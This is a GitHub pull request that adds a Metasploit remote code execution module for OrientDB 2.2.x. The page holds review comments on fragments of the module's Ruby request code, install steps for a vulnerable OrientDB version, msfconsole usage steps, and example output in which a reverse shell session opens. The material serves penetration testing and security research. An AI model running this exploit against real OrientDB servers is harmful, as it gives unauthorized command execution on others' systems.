Add OrientDB 2.2.x RCE Module #8736
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
added 5 commits
July 18, 2017 16:53
…sted the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success
bcoles
reviewed
Jul 23, 2017
| items.each do |item| | ||
| request_parameters = { | ||
| 'method' => 'POST', | ||
| 'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20?format=rid,type,version,class,graph"), |
There was a problem hiding this comment.
Use vars_get rather than appending the query string to the URL.
There was a problem hiding this comment.
Now using vars_get on all requests.
bcoles
reviewed
Jul 23, 2017
| def exploit | ||
| @uri = target_uri | ||
| @uri.path = normalize_uri(@uri.path) | ||
| @uri.path << "/" if @uri.path[-1, 1] != "/" |
There was a problem hiding this comment.
If you're using normalize_uri then in theory you shouldn't need to do this check for / as normalize_uri will take care of formatting the URL for you.
For example, {'uri' => normalize_uri(target_uri.path), 'listDatabases'}
There was a problem hiding this comment.
Removed redundant uri normalization checking
bcoles
reviewed
Jul 23, 2017
| uri = target_uri | ||
| uri.path = normalize_uri(uri.path) | ||
| uri.path << "/" if uri.path[-1, 1] != "/" | ||
| res = send_request_raw({'uri' => "#{uri.path}listDatabases"}) |
There was a problem hiding this comment.
Is there a reason you're using send_request_raw rather than sen_request_cgi ? The latter is preferred.
There was a problem hiding this comment.
I was having issues with the URL encoding. The exploit didn't work because of this. The "encode_params" resolved the issue and every request is now using send_request_cgi
added 2 commits
July 24, 2017 09:52
…redundant uri normalization checking; Swapped send_request_raw for send_request_cgi; using vars_get;
|
Unfortunately this didn't work for me on Windows 7. Here's some output, printing the response from step 2 in |
…iting windows boxes
|
Yeah I really need to use send_request_raw. The send_request_cgi encoding breaks the HTTP requests somehow for windows boxes. Using send_request_raw the exploit works on both linux and windows. |
|
Did you spot any more issues with the execution of the module? |
|
@ricardojba i'll see if i can take a look at this today |
|
Worked for me ...snip... |
|
Just a heads up that i did some ninja patching to the documentation since this had been in the queue for so long. See here: e7aa06c#diff-a2827c36764dd349af0d4cbb8ba31623 Thanks for the patience! |
Release NotesThis module adds a remote code execution exploit for orientdb's web interface |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
Vulnerable Application
OrientDB 2.2.2 <= 2.2.22
Installation
Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi$ unzip orientdb-community-2.2.20.zip$ chmod 755 bin/*.sh$ chmod -R 777 config$ cd bin$ ./server.shReferences for running OrientDB
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
References for vulnerability
https://blogs.securiteam.com/index.php/archives/3318
http://www.palada.net/index.php/2017/07/13/news-2112/
https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
Verification Steps
msfconsoleuse exploit/multi/http/orientdb_execset rhost <RHOST>set target <TARGET_NUMBER>set workspace <WORKSPACE>checkrunExample Output
[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100